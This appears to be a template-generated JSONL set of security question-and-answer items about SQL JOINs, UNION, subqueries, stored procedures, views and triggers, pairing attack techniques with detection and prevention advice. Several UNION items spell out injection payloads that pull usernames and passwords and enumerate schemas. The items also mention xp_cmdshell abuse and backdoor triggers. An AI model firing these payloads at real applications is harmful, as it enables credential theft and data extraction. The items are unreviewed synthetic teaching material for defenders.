+{"id": "trtp-d3e1dbc132be", "instruction": "What are common attack techniques involving SQL JOIN Operations?", "output": "Attack techniques involving SQL JOIN Operations:\n\n- JOIN injection to access related tables\n- CROSS JOIN for denial of service (Cartesian explosion)\n- Information disclosure through JOIN results\n- Privilege escalation via JOIN to admin tables\n\nDefenders can detect these attacks by:\n- Unexpected table access in queries\n- Query complexity spikes\n- CROSS JOIN detection", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-join-operations", "license": "original", "retrieved_at": "2025-12-17T19:35:42.074185Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.074266Z", "updated_at": "2025-12-17T19:35:42.074266Z"}
+{"id": "trtp-17ba6d255dd7", "instruction": "What log entries indicate SQL JOIN Operations attacks?", "output": "Methods for detecting SQL JOIN Operations attacks or anomalies:\n\n- Unexpected table access in queries\n- Query complexity spikes\n- CROSS JOIN detection\n- Multi-table access patterns", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-join-operations", "license": "original", "retrieved_at": "2025-12-17T19:35:42.074185Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.074278Z", "updated_at": "2025-12-17T19:35:42.074278Z"}
+{"id": "trtp-c895a68a5f89", "instruction": "How can organizations protect against SQL JOIN Operations?", "output": "Security controls and preventive measures for SQL JOIN Operations:\n\n- View-based access control\n- Query complexity limits\n- Table-level permissions\n- Column-level access restrictions\n\nJOINs expose relationships between tables. Attackers use JOINs in injection to access data across table boundaries. Understanding JOINs helps in both exploitation (extracting related data) and defense (query complexity limits).", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-join-operations", "license": "original", "retrieved_at": "2025-12-17T19:35:42.074185Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.074290Z", "updated_at": "2025-12-17T19:35:42.074290Z"}
+{"id": "trtp-3fa58243fa7f", "instruction": "What does SQL JOIN Operations look like in SQL?", "output": "Example of SQL JOIN Operations:\n\n```sql\nSELECT u.username, o.order_id FROM users u INNER JOIN orders o ON u.user_id = o.user_id;\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-join-operations", "license": "original", "retrieved_at": "2025-12-17T19:35:42.074185Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.074301Z", "updated_at": "2025-12-17T19:35:42.074301Z"}
+{"id": "trtp-4fb87bc463b0", "instruction": "Explain SQL UNION Operator from a security perspective.", "output": "UNION combines result sets from multiple SELECT statements. UNION-based SQL injection is a powerful technique for extracting data from arbitrary tables by appending malicious SELECT statements to legitimate queries.\n\nSecurity Relevance: UNION injection is one of the most effective data extraction techniques. Attackers append SELECT statements to extract credentials, sensitive data, or database schema information. Column count and type matching are key challenges.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-union-operator", "license": "original", "retrieved_at": "2025-12-17T19:35:42.076084Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.076114Z", "updated_at": "2025-12-17T19:35:42.076114Z"}
+{"id": "trtp-4eaa87a0bdf5", "instruction": "What are the key components of SQL UNION Operator?", "output": "SQL UNION Operator consists of the following key components:\n\n- UNION (removes duplicates)\n- UNION ALL (keeps duplicates)\n- Column count matching requirement\n- Data type compatibility\n- ORDER BY with UNION", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-union-operator", "license": "original", "retrieved_at": "2025-12-17T19:35:42.076084Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.076134Z", "updated_at": "2025-12-17T19:35:42.076134Z"}
+{"id": "trtp-efdac9655d7e", "instruction": "From a security perspective, why should defenders understand SQL UNION Operator?", "output": "UNION injection is one of the most effective data extraction techniques. Attackers append SELECT statements to extract credentials, sensitive data, or database schema information. Column count and type matching are key challenges.\n\nCommon attack vectors include:\n- Data extraction: ' UNION SELECT username, password FROM users--\n- Schema enumeration: UNION SELECT table_name, column_name FROM information_schema.columns\n- File reading (database-specific functions)\n- NULL-based column discovery: UNION SELECT NULL, NULL, NULL--", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-union-operator", "license": "original", "retrieved_at": "2025-12-17T19:35:42.076084Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.076150Z", "updated_at": "2025-12-17T19:35:42.076150Z"}
+{"id": "trtp-7c22b585cd1a", "instruction": "How do attackers abuse SQL UNION Operator?", "output": "Attack techniques involving SQL UNION Operator:\n\n- Data extraction: ' UNION SELECT username, password FROM users--\n- Schema enumeration: UNION SELECT table_name, column_name FROM information_schema.columns\n- File reading (database-specific functions)\n- NULL-based column discovery: UNION SELECT NULL, NULL, NULL--\n\nDefenders can detect these attacks by:\n- UNION keyword in user input\n- information_schema access patterns\n- Response size anomalies", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-union-operator", "license": "original", "retrieved_at": "2025-12-17T19:35:42.076084Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.076166Z", "updated_at": "2025-12-17T19:35:42.076166Z"}
+{"id": "trtp-0baa8f72f434", "instruction": "What indicators reveal malicious activity involving SQL UNION Operator?", "output": "Methods for detecting SQL UNION Operator attacks or anomalies:\n\n- UNION keyword in user input\n- information_schema access patterns\n- Response size anomalies\n- Column count probing patterns", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-union-operator", "license": "original", "retrieved_at": "2025-12-17T19:35:42.076084Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.076179Z", "updated_at": "2025-12-17T19:35:42.076179Z"}
+{"id": "trtp-d16a8892e28a", "instruction": "How can organizations protect against SQL UNION Operator?", "output": "Security controls and preventive measures for SQL UNION Operator:\n\n- Parameterized queries prevent UNION injection\n- Restrict information_schema access\n- Query result limits\n- Web Application Firewall rules\n\nUNION injection is one of the most effective data extraction techniques. Attackers append SELECT statements to extract credentials, sensitive data, or database schema information. Column count and type matching are key challenges.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-union-operator", "license": "original", "retrieved_at": "2025-12-17T19:35:42.076084Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.076192Z", "updated_at": "2025-12-17T19:35:42.076192Z"}
+{"id": "trtp-3b09cb9d7613", "instruction": "What is the syntax for SQL UNION Operator?", "output": "Example of SQL UNION Operator:\n\n```sql\nSELECT product_name, price FROM products UNION SELECT username, password FROM users;\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-union-operator", "license": "original", "retrieved_at": "2025-12-17T19:35:42.076084Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.076202Z", "updated_at": "2025-12-17T19:35:42.076202Z"}
+{"id": "trtp-2746ba70025c", "instruction": "What is SQL Subqueries and why is it important for database security?", "output": "Subqueries are queries nested within other queries. They execute independently and return results used by the outer query. Subqueries enable complex data extraction in injection attacks and can bypass simple input filtering.\n\nSecurity Relevance: Subqueries enable sophisticated injection attacks that bypass simple filters. Attackers use subqueries to extract data, enumerate schemas, or perform conditional logic that reveals information through application behavior.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-subqueries", "license": "original", "retrieved_at": "2025-12-17T19:35:42.078054Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.078083Z", "updated_at": "2025-12-17T19:35:42.078083Z"}
+{"id": "trtp-ff8f62baf5be", "instruction": "What are the key components of SQL Subqueries?", "output": "SQL Subqueries consists of the following key components:\n\n- Scalar subqueries (single value)\n- Table subqueries (result set)\n- Correlated subqueries\n- Subqueries in WHERE, FROM, SELECT\n- EXISTS and NOT EXISTS\n- IN with subqueries", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-subqueries", "license": "original", "retrieved_at": "2025-12-17T19:35:42.078054Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.078104Z", "updated_at": "2025-12-17T19:35:42.078104Z"}
+{"id": "trtp-a694f859c598", "instruction": "What security risks are associated with SQL Subqueries?", "output": "Subqueries enable sophisticated injection attacks that bypass simple filters. Attackers use subqueries to extract data, enumerate schemas, or perform conditional logic that reveals information through application behavior.\n\nCommon attack vectors include:\n- Subquery injection for data extraction\n- EXISTS-based blind injection\n- Correlated subqueries for row-by-row extraction\n- Filter bypass through nested queries", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-subqueries", "license": "original", "retrieved_at": "2025-12-17T19:35:42.078054Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.078118Z", "updated_at": "2025-12-17T19:35:42.078118Z"}
+{"id": "trtp-6494fde03595", "instruction": "What attacks exploit SQL Subqueries?", "output": "Attack techniques involving SQL Subqueries:\n\n- Subquery injection for data extraction\n- EXISTS-based blind injection\n- Correlated subqueries for row-by-row extraction\n- Filter bypass through nested queries\n\nDefenders can detect these attacks by:\n- Nested SELECT patterns in input\n- Query complexity metrics\n- Subquery execution monitoring", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-subqueries", "license": "original", "retrieved_at": "2025-12-17T19:35:42.078054Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.078131Z", "updated_at": "2025-12-17T19:35:42.078131Z"}
+{"id": "trtp-8b1e1fa1d744", "instruction": "How do you detect exploitation of SQL Subqueries?", "output": "Methods for detecting SQL Subqueries attacks or anomalies:\n\n- Nested SELECT patterns in input\n- Query complexity metrics\n- Subquery execution monitoring\n- Performance anomalies from complex subqueries", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-subqueries", "license": "original", "retrieved_at": "2025-12-17T19:35:42.078054Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.078143Z", "updated_at": "2025-12-17T19:35:42.078143Z"}
+{"id": "trtp-ed4ccf8452e8", "instruction": "How can organizations protect against SQL Subqueries?", "output": "Security controls and preventive measures for SQL Subqueries:\n\n- Parameterized queries handle subqueries safely\n- Query timeout limits\n- Complexity restrictions\n- Allowlist input validation\n\nSubqueries enable sophisticated injection attacks that bypass simple filters. Attackers use subqueries to extract data, enumerate schemas, or perform conditional logic that reveals information through application behavior.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-subqueries", "license": "original", "retrieved_at": "2025-12-17T19:35:42.078054Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.078154Z", "updated_at": "2025-12-17T19:35:42.078154Z"}
+{"id": "trtp-3cbce75156d0", "instruction": "What does SQL Subqueries look like in SQL?", "output": "Example of SQL Subqueries:\n\n```sql\nSELECT * FROM products WHERE price > (SELECT AVG(price) FROM products);\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-subqueries", "license": "original", "retrieved_at": "2025-12-17T19:35:42.078054Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.078165Z", "updated_at": "2025-12-17T19:35:42.078165Z"}
+{"id": "trtp-e769746e89bd", "instruction": "How does SQL Stored Procedures work and what are its security implications?", "output": "Stored procedures are precompiled SQL code stored in the database. They can encapsulate business logic, provide security through abstraction, but also introduce vulnerabilities if they use dynamic SQL internally.\n\nSecurity Relevance: Stored procedures can improve security by abstracting direct table access, but procedures with dynamic SQL are vulnerable to second-order injection. Some procedures (like xp_cmdshell) provide dangerous system access.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-stored-procedures", "license": "original", "retrieved_at": "2025-12-17T19:35:42.079958Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.079996Z", "updated_at": "2025-12-17T19:35:42.079996Z"}
+{"id": "trtp-0e21339adb31", "instruction": "What are the key components of SQL Stored Procedures?", "output": "SQL Stored Procedures consists of the following key components:\n\n- Procedure creation and parameters\n- Input/output parameters\n- Return values\n- Error handling\n- Transaction control within procedures\n- Dynamic SQL in procedures", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-stored-procedures", "license": "original", "retrieved_at": "2025-12-17T19:35:42.079958Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.080016Z", "updated_at": "2025-12-17T19:35:42.080016Z"}
+{"id": "trtp-e4b781483cba", "instruction": "Why is SQL Stored Procedures important for database security?", "output": "Stored procedures can improve security by abstracting direct table access, but procedures with dynamic SQL are vulnerable to second-order injection. Some procedures (like xp_cmdshell) provide dangerous system access.\n\nCommon attack vectors include:\n- Injection through dynamic SQL in procedures\n- Abuse of dangerous procedures (xp_cmdshell)\n- Privilege escalation via procedure execution\n- Second-order injection through procedure parameters", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-stored-procedures", "license": "original", "retrieved_at": "2025-12-17T19:35:42.079958Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.080030Z", "updated_at": "2025-12-17T19:35:42.080030Z"}
+{"id": "trtp-57252800b5a3", "instruction": "What are common attack techniques involving SQL Stored Procedures?", "output": "Attack techniques involving SQL Stored Procedures:\n\n- Injection through dynamic SQL in procedures\n- Abuse of dangerous procedures (xp_cmdshell)\n- Privilege escalation via procedure execution\n- Second-order injection through procedure parameters\n\nDefenders can detect these attacks by:\n- Procedure execution auditing\n- Dynamic SQL within procedure monitoring\n- Dangerous procedure usage alerts", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-stored-procedures", "license": "original", "retrieved_at": "2025-12-17T19:35:42.079958Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.080056Z", "updated_at": "2025-12-17T19:35:42.080056Z"}
+{"id": "trtp-b1cc05279e60", "instruction": "What log entries indicate SQL Stored Procedures attacks?", "output": "Methods for detecting SQL Stored Procedures attacks or anomalies:\n\n- Procedure execution auditing\n- Dynamic SQL within procedure monitoring\n- Dangerous procedure usage alerts\n- Parameter analysis for injection patterns", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-stored-procedures", "license": "original", "retrieved_at": "2025-12-17T19:35:42.079958Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.080068Z", "updated_at": "2025-12-17T19:35:42.080068Z"}
+{"id": "trtp-a0241ec8a96d", "instruction": "What security controls mitigate SQL Stored Procedures risks?", "output": "Security controls and preventive measures for SQL Stored Procedures:\n\n- Use parameterized queries within procedures\n- Disable dangerous system procedures\n- Principle of least privilege for procedure execution\n- Code review for dynamic SQL patterns\n\nStored procedures can improve security by abstracting direct table access, but procedures with dynamic SQL are vulnerable to second-order injection. Some procedures (like xp_cmdshell) provide dangerous system access.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-stored-procedures", "license": "original", "retrieved_at": "2025-12-17T19:35:42.079958Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.080084Z", "updated_at": "2025-12-17T19:35:42.080084Z"}
+{"id": "trtp-045245d2628d", "instruction": "What is the syntax for SQL Stored Procedures?", "output": "Example of SQL Stored Procedures:\n\n```sql\nCREATE PROCEDURE GetUserByID(@UserID INT) AS SELECT * FROM users WHERE user_id = @UserID;\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-stored-procedures", "license": "original", "retrieved_at": "2025-12-17T19:35:42.079958Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.080095Z", "updated_at": "2025-12-17T19:35:42.080095Z"}
+{"id": "trtp-7a281e609c66", "instruction": "What is SQL Views and why is it important for database security?", "output": "Views are virtual tables defined by SELECT statements. They can provide security by restricting visible columns/rows, but improper view definitions can leak sensitive data or enable injection through view definitions.\n\nSecurity Relevance: Views can implement column-level and row-level security, hiding sensitive data from users. However, views that expose functions or allow updates can introduce vulnerabilities. View definitions may leak schema information.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-views", "license": "original", "retrieved_at": "2025-12-17T19:35:42.082251Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.082289Z", "updated_at": "2025-12-17T19:35:42.082289Z"}
+{"id": "trtp-91ec9fa8d08b", "instruction": "What are the main parts of SQL Views that security teams should understand?", "output": "SQL Views consists of the following key components:\n\n- Simple views (single table)\n- Complex views (joins, aggregations)\n- Updatable views\n- WITH CHECK OPTION\n- Materialized views\n- Security-definer views", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-views", "license": "original", "retrieved_at": "2025-12-17T19:35:42.082251Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.082310Z", "updated_at": "2025-12-17T19:35:42.082310Z"}
+{"id": "trtp-5b730fee41eb", "instruction": "Why is SQL Views important for database security?", "output": "Views can implement column-level and row-level security, hiding sensitive data from users. However, views that expose functions or allow updates can introduce vulnerabilities. View definitions may leak schema information.\n\nCommon attack vectors include:\n- View bypass to access underlying tables\n- Schema enumeration through view definitions\n- Injection through updatable views\n- Information leakage via view errors", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-views", "license": "original", "retrieved_at": "2025-12-17T19:35:42.082251Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.082324Z", "updated_at": "2025-12-17T19:35:42.082324Z"}
+{"id": "trtp-4ad752349d66", "instruction": "What threats are associated with SQL Views?", "output": "Attack techniques involving SQL Views:\n\n- View bypass to access underlying tables\n- Schema enumeration through view definitions\n- Injection through updatable views\n- Information leakage via view errors\n\nDefenders can detect these attacks by:\n- View access patterns\n- Attempts to access underlying tables directly\n- View definition access monitoring", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-views", "license": "original", "retrieved_at": "2025-12-17T19:35:42.082251Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.082338Z", "updated_at": "2025-12-17T19:35:42.082338Z"}
+{"id": "trtp-328957dd592d", "instruction": "What indicators reveal malicious activity involving SQL Views?", "output": "Methods for detecting SQL Views attacks or anomalies:\n\n- View access patterns\n- Attempts to access underlying tables directly\n- View definition access monitoring\n- UPDATE/DELETE on views", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-views", "license": "original", "retrieved_at": "2025-12-17T19:35:42.082251Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.082350Z", "updated_at": "2025-12-17T19:35:42.082350Z"}
+{"id": "trtp-8c5a7c57f746", "instruction": "How do you defend against SQL Views attacks?", "output": "Security controls and preventive measures for SQL Views:\n\n- Use views to restrict data access\n- Revoke direct table access when using views\n- WITH CHECK OPTION for updatable views\n- Regular view permission auditing\n\nViews can implement column-level and row-level security, hiding sensitive data from users. However, views that expose functions or allow updates can introduce vulnerabilities. View definitions may leak schema information.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-views", "license": "original", "retrieved_at": "2025-12-17T19:35:42.082251Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.082361Z", "updated_at": "2025-12-17T19:35:42.082361Z"}
+{"id": "trtp-ee8a1e94b58f", "instruction": "What does SQL Views look like in SQL?", "output": "Example of SQL Views:\n\n```sql\nCREATE VIEW public_users AS SELECT user_id, username, email FROM users WHERE is_public = TRUE;\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-views", "license": "original", "retrieved_at": "2025-12-17T19:35:42.082251Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.082372Z", "updated_at": "2025-12-17T19:35:42.082372Z"}
+{"id": "trtp-a3a868701f6f", "instruction": "Explain SQL Triggers from a security perspective.", "output": "Triggers are procedures that execute automatically in response to database events (INSERT, UPDATE, DELETE). They can enforce business rules but also introduce security risks through unintended side effects or privilege escalation.\n\nSecurity Relevance: Triggers execute with the definer's privileges, potentially enabling privilege escalation. Malicious triggers can persist backdoors, exfiltrate data on every change, or cause denial of service through recursive execution.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-triggers", "license": "original", "retrieved_at": "2025-12-17T19:35:42.084545Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.084604Z", "updated_at": "2025-12-17T19:35:42.084604Z"}
+{"id": "trtp-928e1919ccae", "instruction": "What are the key components of SQL Triggers?", "output": "SQL Triggers consists of the following key components:\n\n- BEFORE and AFTER triggers\n- INSERT, UPDATE, DELETE triggers\n- INSTEAD OF triggers\n- Row-level vs statement-level triggers\n- Trigger cascading\n- NEW and OLD references", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-triggers", "license": "original", "retrieved_at": "2025-12-17T19:35:42.084545Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.084644Z", "updated_at": "2025-12-17T19:35:42.084644Z"}
+{"id": "trtp-1cb307d9175d", "instruction": "What security risks are associated with SQL Triggers?", "output": "Triggers execute with the definer's privileges, potentially enabling privilege escalation. Malicious triggers can persist backdoors, exfiltrate data on every change, or cause denial of service through recursive execution.\n\nCommon attack vectors include:\n- Trigger-based persistence (backdoor triggers)\n- Data exfiltration through triggers\n- Privilege escalation via trigger execution context\n- Denial of service through trigger recursion", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-triggers", "license": "original", "retrieved_at": "2025-12-17T19:35:42.084545Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.084661Z", "updated_at": "2025-12-17T19:35:42.084661Z"}
+{"id": "trtp-bc1a26b94b51", "instruction": "What attacks exploit SQL Triggers?", "output": "Attack techniques involving SQL Triggers:\n\n- Trigger-based persistence (backdoor triggers)\n- Data exfiltration through triggers\n- Privilege escalation via trigger execution context\n- Denial of service through trigger recursion\n\nDefenders can detect these attacks by:\n- Trigger inventory monitoring\n- Unexpected trigger creation/modification\n- Trigger execution auditing", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-triggers", "license": "original", "retrieved_at": "2025-12-17T19:35:42.084545Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.084674Z", "updated_at": "2025-12-17T19:35:42.084674Z"}
+{"id": "trtp-f03be622405d", "instruction": "How do you detect exploitation of SQL Triggers?", "output": "Methods for detecting SQL Triggers attacks or anomalies:\n\n- Trigger inventory monitoring\n- Unexpected trigger creation/modification\n- Trigger execution auditing\n- Performance impact from triggers", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-triggers", "license": "original", "retrieved_at": "2025-12-17T19:35:42.084545Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.084685Z", "updated_at": "2025-12-17T19:35:42.084685Z"}
+{"id": "trtp-bca4735a5565", "instruction": "How can organizations protect against SQL Triggers?", "output": "Security controls and preventive measures for SQL Triggers:\n\n- Restrict trigger creation privileges\n- Regular trigger auditing\n- Trigger execution context control\n- Disable unnecessary triggers\n\nTriggers execute with the definer's privileges, potentially enabling privilege escalation. Malicious triggers can persist backdoors, exfiltrate data on every change, or cause denial of service through recursive execution.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-triggers", "license": "original", "retrieved_at": "2025-12-17T19:35:42.084545Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.084697Z", "updated_at": "2025-12-17T19:35:42.084697Z"}
+{"id": "trtp-4f15eb569dfa", "instruction": "What does SQL Triggers look like in SQL?", "output": "Example of SQL Triggers:\n\n```sql\nCREATE TRIGGER audit_user_changes AFTER UPDATE ON users FOR EACH ROW INSERT INTO audit_log VALUES (OLD.*, NEW.*);\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-triggers", "license": "original", "retrieved_at": "2025-12-17T19:35:42.084545Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.084707Z", "updated_at": "2025-12-17T19:35:42.084707Z"}
